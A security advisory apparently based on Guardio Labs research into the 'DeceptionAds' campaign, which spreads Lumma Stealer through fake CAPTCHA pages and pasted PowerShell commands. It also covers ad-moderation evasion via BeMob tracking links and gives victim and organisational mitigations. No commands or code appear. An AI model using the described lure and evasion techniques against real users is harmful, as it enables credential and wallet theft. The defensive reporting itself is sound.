Security researchers at Guardio Labs have uncovered a sophisticated malvertising campaign dubbed “DeceptionAds” that employs deceptive CAPTCHA pages to distribute the Lumma Stealer malware. This large-scale operation leverages legitimate advertising networks to reach over one million users daily.
Campaign Infrastructure and Distribution Tactics
The threat actors, believed to be associated with the Vane Viper group, have orchestrated a massive distribution network through the Monetag advertising platform. The campaign generates over one million daily ad impressions across 3,000 websites, primarily targeting users of pirated streaming services and unauthorized software distribution platforms.
Technical Sophistication and Evasion Methods
The attackers leverage BeMob, a legitimate ad tracking service, to circumvent content moderation systems. Instead of direct malicious URLs, the campaign utilizes obfuscated tracking links that appear legitimate to automated security scanning systems. This technique allows malicious content to persist on advertising platforms far longer than direct links would.
Infection Chain and Malware Capabilities
The infection process begins when users encounter a fraudulent CAPTCHA page containing hidden JavaScript code. This code automatically copies a malicious PowerShell command to the victim’s clipboard. When executed through Windows Run (Win+R), the command downloads and installs the Lumma Stealer. The malware targets sensitive information across major browsers, including:
- Stored credentials and passwords
- Browser cookies and active session tokens
- Credit card information saved in browsers
- Browsing history and autofill form data
- Cryptocurrency wallet files and seed phrases
Who Is at Risk
Windows users who browse ad-supported websites — particularly piracy and freeware sites — are the primary targets. Anyone who has recently interacted with an unusual CAPTCHA prompt asking them to press keyboard shortcuts (Win+R, Ctrl+V, Enter) should treat their system as potentially compromised and scan immediately. Lumma Stealer exfiltrates data silently; victims typically have no visible symptoms until credentials are abused.
What to Do If You Encountered This Campaign
- Run a full scan with a reputable endpoint protection tool (Microsoft Defender, Malwarebytes) immediately
- Change all passwords stored in your browser from a clean, unaffected device
- Revoke and regenerate any cryptocurrency wallet keys or move funds to a new wallet
- Invalidate all active browser sessions by logging out across all accounts
- Enable multi-factor authentication on email, banking, and crypto accounts
Mitigation for Organizations
Monetag suspended approximately 200 malicious advertiser accounts, but the campaign adapted quickly by shifting to alternative advertising platforms. MITRE ATT&CK tracks clipboard-based PowerShell execution under technique T1059.001. Security teams should block execution of clipboard-pasted commands via Group Policy and deploy CISA-recommended endpoint hardening. Legitimate CAPTCHA services never require users to open a command prompt or run keyboard shortcuts.
